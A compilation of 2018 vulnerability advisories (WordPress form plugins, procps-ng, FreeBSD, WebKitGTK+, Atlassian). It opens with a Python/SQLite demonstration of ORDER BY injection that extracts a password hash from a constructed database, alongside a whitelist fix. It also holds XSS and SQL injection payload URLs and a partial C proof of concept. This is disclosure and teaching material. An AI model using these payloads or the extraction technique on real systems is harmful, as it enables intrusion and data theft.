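Both injection points in the WP Google Map advisory above (3.1 and 3.2) sit in an ORDER BY clause, which is the one place a bound parameter cannot help: column names and sort directions are identifiers, not values, so the fix has to be validation against a whitelist. The following Python/SQLite program is an added illustration, not the plugin's PHP and not DefenseCode's proof of concept: the tables, rows and the hash value are constructed, and the `vulnerable_query` function only mirrors the string concatenation at lines 519-522 of class.tabular.php. The advisory's PROCEDURE ANALYSE and SLEEP() payloads are MySQL-specific, so this example uses the engine-independent technique of flipping the sort order on a condition to read data out through the row order. In WordPress the corresponding whitelist is normally a fixed array of column names checked with `in_array()`; core's `sanitize_sql_orderby()` only checks that the string looks like `column asc, column2 desc` and does not know which columns exist, so it is not a substitute for the whitelist.

```python
"""ORDER BY injection of the kind in DC-2018-05-002 (3.1 and 3.2 above).
Constructed illustration with SQLite, not the plugin's PHP or MySQL: the
table names, rows and the hash value are invented. Flipping the sort key
on a condition works on any engine, unlike the advisory's MySQL payloads."""
import sqlite3
import string
from typing import Optional


def make_db() -> sqlite3.Connection:
    """Constructed sample data, not the plugin's real schema."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE wp_map_locations (location_id INTEGER PRIMARY KEY, location_address TEXT);
        INSERT INTO wp_map_locations VALUES (1, 'Alpha Street'), (2, 'Beta Avenue');
        CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT);
        INSERT INTO wp_users VALUES (1, 'admin', '$P$BsecretHash');
    """)
    return db


def vulnerable_query(orderby: str, order: str) -> str:
    """Mirrors class.tabular.php lines 519-522: both request values are
    interpolated into the SQL text."""
    return f"SELECT location_id FROM wp_map_locations order by {orderby} {order}"


ALLOWED_COLUMNS = {"location_id", "location_address"}


def safe_order_clause(orderby: str, order: str, default: str = "location_id") -> str:
    """Identifiers cannot be bound as parameters, so the column is checked
    against a whitelist and the direction is reduced to ASC or DESC."""
    column = orderby if orderby in ALLOWED_COLUMNS else default
    direction = "DESC" if order.lower() == "desc" else "ASC"
    return f"order by {column} {direction}"


def first_row_id(db: sqlite3.Connection, sql: str) -> int:
    return db.execute(sql).fetchone()[0]


def leak_char(db: sqlite3.Connection, position: int,
              charset: str = string.ascii_letters + string.digits + "$./") -> Optional[str]:
    """Boolean-based extraction through the sort key: when the guessed
    character is right the rows sort by location_id, otherwise by its
    negation, so the id of the first row reveals the answer."""
    for c in charset:
        expr = ("(CASE WHEN substr((SELECT user_pass FROM wp_users WHERE ID=1),"
                f"{position},1)='{c}' THEN location_id ELSE -location_id END)")
        if first_row_id(db, vulnerable_query(expr, "asc")) == 1:
            return c
    return None


def leak_prefix(db: sqlite3.Connection, length: int) -> str:
    """Recover the first `length` characters of the admin password hash
    one ORDER BY request per candidate character."""
    return "".join(leak_char(db, i) or "?" for i in range(1, length + 1))


if __name__ == "__main__":
    db = make_db()
    print("leaked via ORDER BY:", leak_prefix(db, 4))
    print("whitelisted clause :", safe_order_clause("location_id, (SELECT 1)", "asc"))
```

The point of the `leak_char` loop is that an ORDER BY injection needs no error messages and no time delay: two visible rows and a conditional sort key are enough to read the database one character per request, which is why the advisory rates these issues High even though the sink is "only" a sort clause. `safe_order_clause` ignores anything that is not a known column and never copies the request value into the SQL text.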
DefenseCode ThunderScan SAST Advisory: WordPress Ultimate Form Builder Lite Plugin Multiple Vulnerabilities (XSS and SQLi)
DefenseCode ThunderScan SAST Advisory: WordPress Ultimate Form Builder Lite Plugin Multiple Vulnerabilities (XSS and SQLi)

Advisory ID:     DC-2018-05-009
Advisory Title:  WordPress Ultimate Form Builder Lite Plugin Multiple Vulnerabilities (XSS and SQLi)
Advisory URL:    http://www.defensecode.com/advisories.php
Software:        WordPress Ultimate Form Builder Lite plugin
Language:        PHP
Version:         1.3.7 and below
Vendor Status:   Vendor contacted, update released
Release Date:    2018/06/12
Risk:            Medium

1. General Overview
===================

During the security audit of Ultimate Form Builder Lite plugin for WordPress CMS, multiple vulnerabilities were discovered using DefenseCode ThunderScan application source code security analysis platform.

More information about ThunderScan is available at URL:
http://www.defensecode.com

2. Software Overview
====================

According to the plugin developers, Ultimate Form Builder Lite is a free WordPress Plugin which allows you to create various contact forms with drag and drop form builder. Its fun because – you can create, customize and build the beautiful forms for your site on your own, receive contact email on any desired email address and store the form entries in your database which can be exported to CSV for your use via plugin’s backend.

According to wordpress.org, it has more than 40,000 active installs.

Homepage:
https://wordpress.org/plugins/ultimate-form-builder-lite/

3. Vulnerability Description
============================

During the security analysis, ThunderScan discovered Cross-Site Scripting and SQL injection vulnerabilities in Ultimate Form Builder Lite WordPress plugin.

The Cross-Site Scripting vulnerability can enable the attacker to construct a URL that contains malicious JavaScript code. If the administrator of the site makes a request to such a URL, the attacker's code will be executed, with unrestricted access to the WordPress site in question.

The attacker can entice the administrator to visit the URL in various ways, including sending the URL by email, or posting it as part of a comment on the vulnerable site or another forum.

The easiest way to reproduce the SQL injection vulnerability is to visit the provided URL while being logged in as administrator or another user that is authorized to access the plugin settings page. Users that do not have full administrative privileges could abuse the database access the vulnerability provides to either escalate their privileges or obtain and modify database contents they were not supposed to be able to. Note that the entry_id value does pass through sanitize_text_field() before use; that function strips tags and whitespace and offers no protection against SQL metacharacters, which is why the injection survives it.

3.1 Cross-Site Scripting
    Vulnerable Function:  echo()
    Vulnerable Variable:  $_GET['form_id']
    Vulnerable URL:
    http://vulnerablesite.com/wp-admin/admin.php?page=ufbl&action=edit-form&form_id=1";>alert(42)
    File: ultimate-form-builder-lite/inc/views/backend/form-builder.php
    ---------
    10   Shortcode:
    ---------

3.2 SQL injection
    Vulnerable Function:  $wpdb->get_row()
    Vulnerable Variable:  $_POST['entry_id']
    Vulnerable URL:
    http://vulnerablesite.com/wp-admin/admin-ajax.php
    Vulnerable POST body:
    entry_id=1&_wpnonce=xxx&action=ufbl_get_entry_detail_action
    File: ultimate-form-builder-lite/ultimate-form-builder-lite.php
    ---------
    369  $entry_id = sanitize_text_field( $_POST['entry_id'] );
    ...
    370  $entry_row = $this->model->get_entry_detail( $entry_id );
    ---------
    File: ultimate-form-builder-lite\classes\ufbl-model.php
    ---------
    243  public static function get_entry_detail( $entry_id ) {
    ...
    248  $entry_row = $wpdb->get_row( "SELECT * FROM $entry_table INNER JOIN $form_table ON $entry_table.form_id = $form_table.form_id WHERE $entry_table.entry_id = $entry_id", 'ARRAY_A' );
    ---------

4. Solution
===========

After the vulnerabilities were reported, the vendor resolved the security issues. All users are strongly advised to update WordPress Ultimate Form Builder Lite plugin to the latest available version.

5. Credits
==========

Discovered by Neven Biruski using DefenseCode ThunderScan source code security analyzer.

6. Disclosure Timeline
======================

2018/06/01  Vulnerabilities discovered
2018/06/06  Vendor contacted
2018/06/08  Vendor responded
2018/06/12  Advisory released to the public

7. About DefenseCode
====================

DefenseCode L.L.C. delivers products and services designed to analyze and test web, desktop and mobile applications for security vulnerabilities.

DefenseCode ThunderScan is a SAST (Static Application Security Testing, WhiteBox Testing) solution for performing extensive security audits of application source code. ThunderScan SAST performs fast and accurate analyses of large and complex source code projects delivering precise results and low false positive rate.

DefenseCode WebScanner is a DAST (Dynamic Application Security Testing, BlackBox Testing) solution for comprehensi
DefenseCode ThunderScan SAST Advisory: WordPress Form Maker Plugin Multiple Security Vulnerabilities
Advisory ID: DC-2018-05-001
Advisory Title: WordPress Form Maker Plugin Multiple Vulnerabilities
Advisory URL: http://www.defensecode.com/advisories.php
Software: WordPress Form Maker plugin
Language: PHP
Version: 1.12.24 and below
Vendor Status: Vendor contacted, update released
Release Date: 2018/06/07
Risk: High

1. General Overview
===
During the security audit of the Form Maker plugin for WordPress CMS, multiple vulnerabilities were discovered using the DefenseCode ThunderScan application source code security analysis platform. More information about ThunderScan is available at URL: http://www.defensecode.com

2. Software Overview

According to the plugin developers, Form Maker is a power-packed yet user-friendly form builder plugin, the best WordPress form builder plugin in the WordPress Plugin Directory. According to wordpress.org, it has more than 100 000 active installs. According to the developer's website, it was downloaded over two million times. The exact number of "premium" version installs remains to be determined.

Homepage:
https://wordpress.org/plugins/form-maker/
https://web-dorado.com/products/wordpress-form.html

3. Vulnerability Description

During the security analysis, ThunderScan discovered SQL injection and Cross-Site Scripting vulnerabilities in the Form Maker WordPress plugin. The SQL injection points are susceptible to Cross Site Request Forgery (CSRF).

The easiest way to reproduce the SQL injection vulnerabilities is to open the presented HTML/JavaScript snippet in your browser while being logged in as administrator or another user that is authorized to access the plugin settings page. Users that do not have full administrative privileges could abuse the database access the vulnerabilities provide to either escalate their privileges or obtain and modify database contents they were not supposed to be able to. Since the injection points are also susceptible to CSRF (due to the improper checking of the nonce token), a valid attack vector is also to send a link to the administrator that leads to any attacker controlled web page containing such or a similar code snippet.

The Cross-Site Scripting vulnerabilities can enable the attacker to construct a URL that contains malicious JavaScript code. If the administrator of the site makes a request to such a URL, the attacker's code will be executed, with unrestricted access to the WordPress site in question. The attacker can entice the administrator to visit the URL in various ways, including sending the URL by email, posting it as a part of the comment on the vulnerable site or another forum.

3.1 SQL injection

Vulnerable Function: get_results()
Vulnerable Variable: $_POST['name']
Vulnerable URL: http://vulnerablesite.com/wp-admin/admin-ajax.php?action=FormMakerSQLMapping&task=db_table_struct
File: form-maker/admin/models/FMSqlMapping.php
Proof of Concept: See Appendix #1
-
81 $name = isset($_POST['name']) ? $_POST['name'] : NULL;
...
87 $query = "SHOW COLUMNS FROM " . $name;
...
94 $table_struct = $wpdb_temp->get_results($query);
-

3.2 SQL injection

Vulnerable Function: get_col()
Vulnerable Variable: $_REQUEST['search_labels']
Vulnerable URL: http://vulnerablesite.com/wp-admin/admin-ajax.php?form_id=6&send_header=0&action=generete_csv&limitstart=0
File: form-maker/framework/WDW_FM_Library.php
Proof of Concept: See Appendix #2
-
3901 $search_labels = isset($_REQUEST['search_labels']) ? $_REQUEST['search_labels'] : '';
...
3934 $query = $wpdb->prepare("SELECT distinct group_id FROM " . $wpdb->prefix . "formmaker_submits where form_id=%d and group_id IN(" . $search_labels . ")", $form_id);
3935 $group_id_s = $wpdb->get_col($query);
-

3.3 Cross-Site Scripting

Vulnerable Function: echo()
Vulnerable Variable: $_REQUEST["active_tab"]
Vulnerable URL: http://vulnerablesite.com/wp-admin/admin.php?page=themes_fm&task=edit&active_tab=";>alert(42)
File: form-maker/admin/views/Themes_fm.php
-
192 $active_tab = isset($_REQUEST["active_tab"]) && $_REQUEST["active_tab"] ? $_REQUEST["active_tab"] : ($row->version == 1 ? 'custom_css' : 'global');
...
199
-

3.4 Cross-Site Scripting

Vulnerable Function: echo()
Vulnerable Variable: $_REQUEST["pagination"]
Vulnerable URL: http://vulnerablesite.com/wp-admin/admin.php?page=themes_fm&task=edit&pagination=";>alert(42)<%2Fscript>
File: form-maker/adm
DefenseCode ThunderScan SAST Advisory: WordPress Contact Form Maker Plugin Multiple Security Vulnerabilities
Advisory ID: DC-2018-05-004
Advisory Title: WordPress Contact Form Maker Plugin Multiple Vulnerabilities
Advisory URL: http://www.defensecode.com/advisories.php
Software: WordPress Contact Form Maker plugin
Language: PHP
Version: 1.12.20 and below
Vendor Status: Vendor contacted, update released
Release Date: 2018/06/07
Risk: High

1. General Overview
===
During the security audit of the Contact Form Maker plugin for WordPress CMS, multiple vulnerabilities were discovered using the DefenseCode ThunderScan application source code security analysis platform. More information about ThunderScan is available at URL: http://www.defensecode.com

2. Software Overview

According to the plugin developers, Contact Form Maker is a simple form creator plugin, which allows a user with no knowledge of programming to create and edit different types of responsive website forms. The product is similar to the WordPress Form Maker, using most of its functionality, although there are also some differences. According to wordpress.org, it has more than 60 000 active installs. According to the developer's website, it was downloaded over a million times. The exact number of "premium" version installs remains to be determined.

Homepage:
https://wordpress.org/plugins/contact-form-maker/
https://web-dorado.com/products/wordpress-contact-form-builder.html

3. Vulnerability Description

During the security analysis, ThunderScan discovered SQL injection and Cross-Site Scripting vulnerabilities in the Contact Form Maker WordPress plugin. The SQL injection points are susceptible to Cross Site Request Forgery (CSRF).

The easiest way to reproduce the SQL injection vulnerabilities is to open the presented HTML/JavaScript snippet in your browser while being logged in as administrator or another user that is authorized to access the plugin settings page. Users that do not have full administrative privileges could abuse the database access the vulnerabilities provide to either escalate their privileges or obtain and modify database contents they were not supposed to be able to. Since the injection points are also susceptible to CSRF (due to the improper checking of the nonce token), a valid attack vector is also to send a link to the administrator that leads to any attacker controlled web page containing such or a similar code snippet.

The Cross-Site Scripting vulnerabilities can enable the attacker to construct a URL that contains malicious JavaScript code. If the administrator of the site makes a request to such a URL, the attacker's code will be executed, with unrestricted access to the WordPress site in question. The attacker can entice the administrator to visit the URL in various ways, including sending the URL by email, posting it as a part of the comment on the vulnerable site or another forum.

3.1 SQL injection

Vulnerable Function: get_results()
Vulnerable Variable: $_POST['name']
Vulnerable URL: http://vulnerablesite.com/wp-admin/admin-ajax.php?action=FormMakerSQLMapping_fmc&task=db_table_struct
File: contact-form-maker/admin/models/FMSqlMapping.php
Proof of Concept: See Appendix #1
-
81 $name = isset($_POST['name']) ? $_POST['name'] : NULL;
...
87 $query = "SHOW COLUMNS FROM " . $name;
...
94 $table_struct = $wpdb_temp->get_results($query);
-

3.2 SQL injection

Vulnerable Function: get_col()
Vulnerable Variable: $_REQUEST['search_labels']
Vulnerable URL: http://vulnerablesite.com/wp-admin/admin-ajax.php?form_id=1&send_header=0&action=generete_csv_fmc&limitstart=0
File: contact-form-maker/framework/WDW_FM_Library.php
Proof of Concept: See Appendix #2
-
3951 $search_labels = isset($_REQUEST['search_labels']) ? $_REQUEST['search_labels'] : '';
...
3984 $query = $wpdb->prepare("SELECT distinct group_id FROM " . $wpdb->prefix . "formmaker_submits where form_id=%d and group_id IN(" . $search_labels . ")", $form_id);
3985 $group_id_s = $wpdb->get_col($query);
-

3.3 Cross-Site Scripting

Vulnerable Function: echo()
Vulnerable Variable: $_REQUEST["active_tab"]
Vulnerable URL: http://vulnerablesite.com/wp-admin/admin.php?page=themes_fmc&task=edit&active_tab=";>alert(42)
File: form-maker/admin/views/Themes_fm.php
-
192 $active_tab = isset($_REQUEST["active_tab"]) && $_REQUEST["active_tab"] ? $_REQUEST["active_tab"] : ($row->version == 1 ? 'custom_css' : 'global');
...
199
-

3.4 Cross-Site Scripting

Vulnerable Function: e
Qualys Security Advisory - Procps-ng Audit Report
Contents

Summary
1. FUSE-backed /proc/PID/cmdline
2. Unprivileged process hiding
3. Local Privilege Escalation in top (Low Impact)
4. Denial of Service in ps
5. Local Privilege Escalation in libprocps (High Impact)
   5.1. Vulnerability
   5.2. Exploitation
   5.3. Exploitation details
   5.4. Non-PIE exploitation
   5.5. PIE exploitation
Acknowledgments

Summary

We performed a complete audit of procps-ng, the "command line and full screen utilities for browsing procfs, a 'pseudo' file system dynamically generated by the [Linux] kernel to provide information about the status of entries in its process table" (https://gitlab.com/procps-ng/procps). procps-ng contains the utilities free, kill, pgrep, pidof, pkill, pmap, ps, pwdx, skill, slabtop, snice, sysctl, tload, top, uptime, vmstat, w, watch, and the necessary libprocps library.

We discovered and submitted patches for more than a hundred bugs and vulnerabilities in procps-ng; for reference, our patches are available at:
https://www.qualys.com/2018/05/17/procps-ng-audit-report-patches.tar.gz

In the remainder of this advisory, we present our most interesting findings:

1. FUSE-backed /proc/PID/cmdline (CVE-2018-1120)

An attacker can block any read() access to /proc/PID/cmdline by mmap()ing a FUSE file (Filesystem in Userspace) onto this process's command-line arguments. The attacker can therefore block pgrep, pidof, pkill, ps, and w, either forever (a denial of service), or for some controlled time (a synchronization tool for exploiting other vulnerabilities).

2. Unprivileged process hiding (CVE-2018-1121)

An unprivileged attacker can hide a process from procps-ng's utilities, by exploiting either a denial of service (a rather noisy method) or a race condition inherent in reading /proc/PID entries (a stealthier method).

3. Local Privilege Escalation in top (CVE-2018-1122)

top reads its configuration file from the current working directory, without any security check, if the HOME environment variable is unset or empty. In this very unlikely scenario, an attacker can carry out an LPE (Local Privilege Escalation) if an administrator executes top in /tmp (for example), by exploiting one of several vulnerabilities in top's config_file() function.

4. Denial of Service in ps (CVE-2018-1123)

An attacker can overflow the output buffer of ps, when executed by another user, administrator, or script: a denial of service only (not an LPE), because ps mmap()s its output buffer and mprotect()s its last page with PROT_NONE (an effective guard page).

5. Local Privilege Escalation in libprocps (CVE-2018-1124)

An attacker can exploit an integer overflow in libprocps's file2strvec() function and carry out an LPE when another user, administrator, or script executes a vulnerable utility (pgrep, pidof, pkill, and w are vulnerable by default; other utilities are vulnerable if executed with non-default options). Moreover, an attacker's process running inside a container can trigger this vulnerability in a utility running outside the container: the attacker can exploit this userland vulnerability and break out of the container or chroot. We will publish our proof-of-concept exploits in the near future.

Additionally, CVE-2018-1125 has been assigned to 0008-pgrep-Prevent-a-potential-stack-based-buffer-overflo.patch, and CVE-2018-1126 to 0035-proc-alloc.-Use-size_t-not-unsigned-int.patch.

1. FUSE-backed /proc/PID/cmdline (CVE-2018-1120)

In this experiment, we add a sleep(60) to hello_read() in https://github.com/libfuse/libfuse/blob/master/example/hello.c and compile it, mount it on /tmp/fuse, and mmap() /tmp/fuse/hello onto the command-line arguments of a simple proof-of-concept:

$ gcc -Wall hello.c `pkg-config fuse --cflags --libs` -o hello
$ mkdir /tmp/fuse
$ ./hello /tmp/fuse
$ cat > fuse-backed-cmdline.c << "EOF"
#include
#include
#include
#include
#include
#include
#include
#include

#define die() do { \
    fprintf(stderr, "died in %s: %u\n", __func__, __LINE__); \
    exit(EXIT_FAILURE); \
} while (0)

#define PAGESZ ((size_t)4096)

int main(const int argc, const char * const argv[])
{
    if (argc <= 0) die();
    const char * const arg_start = argv[0];
    const char * const last_arg = argv[argc-1];
    const char * const arg_end = last_arg + strlen(last_arg) + 1;
    if (arg_end <= arg_start) die();
    const size_t len = arg_
FreeBSD Security Advisory FreeBSD-SA-18:06.debugreg
=============================================================================
FreeBSD-SA-18:06.debugreg                                   Security Advisory
                                                          The FreeBSD Project

Topic:          Mishandling of x86 debug exceptions

Category:       core
Module:         kernel
Announced:      2018-05-08
Credits:        Nick Peterson, Everdox Tech LLC
                https://www.linkedin.com/in/everdox
                Andy Lutomirski
Affects:        All supported versions of FreeBSD.
Corrected:      2018-05-08 17:03:33 UTC (stable/11, 11.2-PRERELEASE)
                2018-05-08 17:12:10 UTC (releng/11.1, 11.1-RELEASE-p10)
                2018-05-08 17:05:39 UTC (stable/10, 10.4-STABLE)
                2018-05-08 17:12:10 UTC (releng/10.4, 10.4-RELEASE-p9)
CVE Name:       CVE-2018-8897

For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit <https://security.FreeBSD.org/>.

I.   Background

On x86 architecture systems, the stack is represented by the combination of a stack segment and a stack pointer, which must remain in sync for proper operation. Instructions related to manipulating the stack segment have special handling to facilitate consistency with changes to the stack pointer.

II.  Problem Description

The MOV SS and POP SS instructions inhibit debug exceptions until the instruction boundary following the next instruction. If that instruction is a system call or similar instruction that transfers control to the operating system, the debug exception will be handled in the kernel context instead of the user context.

III. Impact

An authenticated local attacker may be able to read sensitive data in kernel memory, control low-level operating system functions, or may panic the system.

IV.  Workaround

No workaround is available.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date, using either a binary or source code patch, and then reboot.

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

And reboot.

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.

[FreeBSD 11.1]
# fetch https://security.FreeBSD.org/patches/SA-18:06/debugreg.11.1.patch
# fetch https://security.FreeBSD.org/patches/SA-18:06/debugreg.11.1.patch.asc
# gpg --verify debugreg.11.1.patch.asc

[FreeBSD 10.4]
# fetch https://security.FreeBSD.org/patches/SA-18:06/debugreg.10.4.patch
# fetch https://security.FreeBSD.org/patches/SA-18:06/debugreg.10.4.patch.asc
# gpg --verify debugreg.10.4.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile and install your kernel as described in <https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each affected branch.

Branch/path                                                      Revision
-------------------------------------------------------------------------
stable/10/                                                            r70
releng/10.4/                                                          r71
stable/11/                                                            r69
releng/11.1/                                                          r71
-------------------------------------------------------------------------

To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8897>

The latest revision of this advisory is available at
<https://security.FreeBSD.org/advisories/FreeBSD-SA-18:06.debugreg.asc>
WebKitGTK+ Security Advisory WSA-2018-0004
Date reported   : May 07, 2018
Advisory ID     : WSA-2018-0004
Advisory URL    : https://webkitgtk.org/security/WSA-2018-0004.html
CVE identifiers : CVE-2018-4121, CVE-2018-4200, CVE-2018-4204.

Several vulnerabilities were discovered in WebKitGTK+.

CVE-2018-4121
    Versions affected: WebKitGTK+ before 2.20.0.
    Credit to Natalie Silvanovich of Google Project Zero.
    Impact: Processing maliciously crafted web content may lead to arbitrary code execution.
    Description: Multiple memory corruption issues were addressed with improved memory handling.

CVE-2018-4200
    Versions affected: WebKitGTK+ before 2.20.2.
    Credit to Ivan Fratric of Google Project Zero.
    Impact: Processing maliciously crafted web content may lead to arbitrary code execution.
    Description: A memory corruption issue was addressed with improved state management.

CVE-2018-4204
    Versions affected: WebKitGTK+ before 2.20.1.
    Credit to Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative, found by OSS-Fuzz.
    Impact: Processing maliciously crafted web content may lead to arbitrary code execution.
    Description: A memory corruption issue was addressed with improved memory handling.

We recommend updating to the latest stable version of WebKitGTK+. It is the best way of ensuring that you are running a safe version of WebKitGTK+. Please check our website for information about the latest stable releases.

Further information about WebKitGTK+ Security Advisories can be found at: https://webkitgtk.org/security.html

The WebKitGTK+ team,
May 07, 2018
Advisory - Sourcetree for Windows - CVE-2018-5226
This email refers to the advisory found at https://confluence.atlassian.com/x/ERyUO .

CVE ID:
* CVE-2018-5226.

Product: Sourcetree for Windows.

Affected Sourcetree for Windows product versions:
version < 2.5.5.0

Fixed Sourcetree for Windows product versions:
* Sourcetree for Windows 2.5.5.0 has been released with a fix for this issue.

Summary:
This advisory discloses a critical severity security vulnerability. Versions of Sourcetree for Windows before version 2.5.5.0 are affected by this vulnerability.

Customers who have upgraded Sourcetree for Windows to version 2.5.5.0 are not affected. Customers using Sourcetree for Mac are not affected.

Customers who have downloaded and installed Sourcetree for Windows less than 2.5.5.0 please upgrade your Sourcetree for Windows installations immediately to fix this vulnerability.

SourceTree for Windows - Argument injection via Mercurial tag names - CVE-2018-5226

Severity:
Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low.

This is our assessment and you should evaluate its applicability to your own IT environment.

Description:
There was an argument injection vulnerability in Sourcetree for Windows via the name of a Mercurial repository tag that is going to be deleted. An attacker with permission to create a tag on a Mercurial repository linked in Sourcetree for Windows is able to exploit this issue to gain code execution on the system. All versions of Sourcetree for Windows before 2.5.5.0 are affected by this vulnerability.

This issue can be tracked at: https://jira.atlassian.com/browse/SRCTREEWIN-8509 .

Fix:
To address this issue, we've released the following versions containing a fix:
* Sourcetree for Windows version 2.5.5.0

Remediation:
Upgrade Sourcetree for Windows to version 2.5.5.0 or higher.

The vulnerabilities and fix versions are described above. If affected, you should upgrade to the latest version immediately.

For a full description of the latest version of Sourcetree for Windows, see the release notes found at https://www.sourcetreeapp.com/update/windows/ga/ReleaseNotes_2.5.5.html. You can download the latest version of Sourcetree for Windows from the download centre found at https://www.sourcetreeapp.com/.

Acknowledgements:
Atlassian would like to credit ZhangTianqi @ Tophant for reporting this issue to us.
WebKitGTK+ Security Advisory WSA-2018-0003
Date reported   : April 04, 2018
Advisory ID     : WSA-2018-0003
Advisory URL    : https://webkitgtk.org/security/WSA-2018-0003.html
CVE identifiers : CVE-2018-4101, CVE-2018-4113, CVE-2018-4114, CVE-2018-4117, CVE-2018-4118, CVE-2018-4119, CVE-2018-4120, CVE-2018-4122, CVE-2018-4125, CVE-2018-4127, CVE-2018-4128, CVE-2018-4129, CVE-2018-4133, CVE-2018-4146, CVE-2018-4161, CVE-2018-4162, CVE-2018-4163, CVE-2018-4165.

Several vulnerabilities were discovered in WebKitGTK+.

CVE-2018-4101
    Versions affected: WebKitGTK+ before 2.20.0.
    Credit to Yuan Deng of Ant-financial Light-Year Security Lab.
    Impact: Processing maliciously crafted web content may lead to arbitrary code execution.
    Description: Multiple memory corruption issues were addressed with improved memory handling.

CVE-2018-4113
    Versions affected: WebKitGTK+ before 2.20.0.
    Credit to OSS-Fuzz.
    Impact: Unexpected interaction with indexing types causing an ASSERT failure.
    Description: An array indexing issue existed in the handling of a function in JavaScriptCore. This issue was addressed through improved checks.

CVE-2018-4114
    Versions affected: WebKitGTK+ before 2.20.0.
    Credit to OSS-Fuzz.
    Impact: Processing maliciously crafted web content may lead to arbitrary code execution.
    Description: Multiple memory corruption issues were addressed with improved memory handling.

CVE-2018-4117
    Versions affected: WebKitGTK+ before 2.20.0.
    Credit to an anonymous researcher.
    Impact: A malicious website may exfiltrate data cross-origin.
    Description: A cross-origin issue existed with the fetch API. This was addressed through improved input validation.

CVE-2018-4118
    Versions affected: WebKitGTK+ before 2.20.0.
    Credit to Jun Kokatsu (@shhnjk).
    Impact: Processing maliciously crafted web content may lead to arbitrary code execution.
    Description: Multiple memory corruption issues were addressed with improved memory handling.

CVE-2018-4119
    Versions affected: WebKitGTK+ before 2.20.0.
    Credit to an anonymous researcher working with Trend Micro's Zero Day Initiative.
    Impact: Processing maliciously crafted web content may lead to arbitrary code execution.
    Description: Multiple memory corruption issues were addressed with improved memory handling.

CVE-2018-4120
    Versions affected: WebKitGTK+ before 2.20.0.
    Credit to Hanming Zhang (@4shitak4) of Qihoo 360 Vulcan Team.
    Impact: Processing maliciously crafted web content may lead to arbitrary code execution.
    Description: Multiple memory corruption issues were addressed with improved memory handling.

CVE-2018-4122
    Versions affected: WebKitGTK+ before 2.20.0.
    Credit to WanderingGlitch of Trend Micro's Zero Day Initiative.
    Impact: Processing maliciously crafted web content may lead to arbitrary code execution.
    Description: Multiple memory corruption issues were addressed with improved memory handling.

CVE-2018-4125
    Versions affected: WebKitGTK+ before 2.20.0.
    Credit to WanderingGlitch of Trend Micro's Zero Day Initiative.
    Impact: Processing maliciously crafted web content may lead to arbitrary code execution.
    Description: Multiple memory corruption issues were addressed with improved memory handling.

CVE-2018-4127
    Versions affected: WebKitGTK+ before 2.20.0.
    Credit to an anonymous researcher working with Trend Micro's Zero Day Initiative.
    Impact: Processing maliciously crafted web content may lead to arbitrary code execution.
    Description: Multiple memory corruption issues were addressed with improved memory handling.

CVE-2018-4128
    Versions affected: WebKitGTK+ before 2.20.0.
    Credit to Zach Markley.
    Impact: Processing maliciously crafted web content may lead to arbitrary code execution.
    Description: Multiple memory corruption issues were addressed with improved memory handling.

CVE-2018-4129
    Versions affected: WebKitGTK+ before 2.20.0.
    Credit to likemeng of Baidu Security Lab working with Trend Micro's Zero Day Initiative.
    Impact: Processing maliciously crafted web content may lead to arbitrary code execution.
    Description: Multiple memory corruption issues were addressed with improved memory handling.

CVE-2018-4133
    Versions affected: WebKitGTK+ before 2.20.0.
    Credit to Anton Lopanitsyn of Wallarm, Linus Särud of Detectify (detectify.com), Yuji Tounai of NTT Communications Corporation.
    Impact: Visiting a maliciously crafted website may lead to a cross-site scripting attack.
    Description: A cross-site scripting issue existed in WebKit. This issue was addressed with improved URL validation.

CVE-2018-4146
    Versions affected: We
Advisory - Fisheye and Crucible - CVE-2018-5223
This email refers to the advisory found at https://confluence.atlassian.com/x/aS5sO and https://confluence.atlassian.com/x/Zi5sO .

CVE ID:
* CVE-2018-5223.

Product: Fisheye and Crucible.

Affected Fisheye and Crucible product versions:
version < 4.4.6
4.5.0 <= version < 4.5.3

Fixed Fisheye and Crucible product versions:
* for 4.4.x, Fisheye 4.4.6 has been released with a fix for this issue.
* for 4.5.x, Fisheye 4.5.3 has been released with a fix for this issue.
* for 4.4.x, Crucible 4.4.6 has been released with a fix for this issue.
* for 4.5.x, Crucible 4.5.3 has been released with a fix for this issue.

Summary:
This advisory discloses a critical severity security vulnerability in Fisheye and Crucible. Versions of Fisheye and Crucible before 4.4.6 (the fixed version for 4.4.x) and from 4.5.0 before 4.5.3 (the fixed version for 4.5.x) running on the Windows operating system are affected by this vulnerability.

Customers who have upgraded Fisheye and Crucible installations to version 4.4.6 or 4.5.3 are not affected.

Customers who have downloaded and installed Fisheye or Crucible less than 4.4.6 (the fixed version for 4.4.x) or who have downloaded and installed Fisheye or Crucible >= 4.5.0 but less than 4.5.3 (the fixed version for 4.5.x) please upgrade your Fisheye and Crucible installations immediately to fix this vulnerability.

Argument injection through Mercurial repository uri handling on Windows (CVE-2018-5223)

Severity:
Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low.

This is our assessment and you should evaluate its applicability to your own IT environment.

Description:
